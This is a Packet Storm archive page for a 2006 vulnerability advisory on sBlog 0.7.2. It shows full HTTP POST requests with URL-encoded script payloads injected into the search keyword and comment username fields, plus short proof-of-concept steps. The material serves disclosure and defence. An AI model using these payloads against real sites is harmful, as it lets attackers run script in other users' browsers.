what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

sBlog_0.72_xss.txt

sBlog_0.72_xss.txt
Posted Mar 9, 2006
Authored by Kiki | Site kiki91.altervista.org

sBlog version 0.7.2 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 3efd11fdde77f4a3ac198fa685c5bdbe4f4eafb8e987b89af57c116ed761bf5d

sBlog_0.72_xss.txt

Change Mirror Download
sBlog 0.7.2 <== Multiple Cross-Site Scripting Vulnerability

===================================

Information of Software:

Software: sBlog 0.7.2
Site: http://servous.se/
Description: sBlog is a simple and new PHP Blog. Is very very simple
and it's use by newbie of PHP.

===================================

Bug:

1) Cross-Site Scripting Vulnearbility in the page search.php

sBlog contains a flaw that allows a remote cross site scripting attack.
The vulnerability is found in search method and the user can modify
the function GET and insert the XSS code

- HTTP Normal POST Request

http://[target]/[patch]/search.php
POST /[patch]/search.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[patch]/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
keyword=casa

- End of Normal POST Request

but we can modify the request POST in this way:

[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E
[....]

---------------------------------------------------------

PoC for the first vulnerability:

you can insert in the search textbox the key <script>alert("lol");</script> for
execute an XSS attack.

###########################################

2) Cross-Site Scripting Vulnearbility in the name of user post comment

With this vulnerability can be exploited by malicious people to conduct
script insertion attacks.
Input passed to the "title" field when editing submitted articles and
reportedly also when commenting on articles isn't properly sanitised
before being used. This can be
exploited to inject arbitrary HTML and script code, which will be executed in
a user's browser session in context of an affected site when the malicious user
data is viewed.

- HTTP Normal POST Request

http://[target]/[patch]/comments_do.php
POST [patch]/comments_do.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[patch]/comments.php?id=news_id
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
blog_id=id_of_news&username=Test&email=&homepage=&comment=Test

but we can modify the variable &username in the request POST in this way:

[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&email=&homepage=&comment=test
[....]

---------------------------------------------------------

PoC for the second vulnerability:

you can insert in the name textbox of user comment an XSS code for
execute an cross-site scripting attack, or an HTML code

===================================

Credit:

Author: Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org and http://blackzero.netsons.org

===================================
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close